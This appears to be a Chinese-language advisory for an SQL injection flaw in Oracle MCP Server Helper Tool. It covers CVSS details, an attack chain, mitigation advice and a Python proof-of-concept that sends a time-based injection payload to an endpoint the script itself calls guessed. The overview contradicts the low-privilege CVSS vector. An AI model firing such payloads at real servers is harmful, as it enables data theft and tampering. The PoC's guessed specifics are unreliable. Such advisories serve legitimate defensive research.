CVE-2026-35228 CVSS 8.7 高危

CVE-2026-35228 Oracle MCP Server Helper Tool SQL注入漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35228

漏洞类型

SQL注入

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Oracle MCP Server Helper Tool

漏洞概述

Oracle MCP Server Helper Tool是Oracle开源项目的一部分。该漏洞存在于helper tool组件中，影响版本1.0.1至1.0.156。未经身份验证的攻击者可通过HTTP网络访问利用此漏洞，成功攻击可导致工具执行恶意SQL语句，进而可能泄露敏感数据或破坏数据库完整性。

技术细节

该漏洞源于Oracle MCP Server Helper Tool的helper tool组件在处理HTTP请求时，未能正确过滤或验证用户提交的输入参数。攻击者利用网络访问权限（AV:N），通过构造包含恶意SQL代码的HTTP请求发送至服务器。由于CVSS向量显示权限要求为低（PR:L）且影响范围为可改变（S:C），攻击者可能利用低级权限账户触发漏洞。当后端数据库拼接执行该SQL语句时，将导致高机密性（C:H）和高完整性（I:H）影响，使攻击者能够读取、修改或删除数据库中的敏感信息。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别运行Oracle MCP Server Helper Tool的目标主机及其HTTP接口。

STEP 2

2. 构造Payload

攻击者根据漏洞特征，构造包含恶意SQL语句的HTTP请求数据包。

STEP 3

3. 发送请求

攻击者通过网络将特制请求发送至受影响组件的HTTP端点。

STEP 4

4. 执行注入

服务器端未经过滤处理输入，直接将恶意代码拼接到SQL查询中并执行。

STEP 5

5. 达成影响

数据库执行恶意命令，导致数据泄露（高机密性影响）或数据被篡改（高完整性影响）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-35228
# SQL Injection in Oracle MCP Server Helper Tool

import requests

def exploit_sql_injection(target_url):
    """
    Attempt to exploit SQL injection vulnerability.
    """
    # Example endpoint based on common MCP structures, adjust as needed
    endpoint = f"{target_url}/api/helper/query"
    
    # Malicious payload to test SQL injection
    # This payload attempts to cause a time-based delay or logical true condition
    payload = "1' UNION SELECT SLEEP(5)-- "
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Content-Type": "application/json"
    }
    
    try:
        # Sending GET request with vulnerable parameter
        params = {
            "id": payload,
            "action": "execute"
        }
        
        print(f"[+] Sending payload to {endpoint}")
        response = requests.get(endpoint, params=params, headers=headers, timeout=10)
        
        if response.elapsed.total_seconds() >= 5:
            print("[!] Potential SQL Injection detected (Time-based delay observed).")
        elif "syntax error" in response.text.lower() or "sql" in response.text.lower():
            print("[!] Potential SQL Injection detected (Error message observed).")
        else:
            print("[*] Request sent, analyze response manually.")
            print("[*] Response Status:", response.status_code)
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to target: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1:8080" # Replace with actual target
    exploit_sql_injection(target)

影响范围

Oracle MCP Server Helper Tool 1.0.1

Oracle MCP Server Helper Tool 1.0.156

防御指南

临时缓解措施

建议立即升级到Oracle发布的修复版本。在无法立即升级的情况下，应通过网络访问控制列表（ACL）严格限制对Helper Tool组件的访问权限，并检查相关日志是否存在异常的SQL查询记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表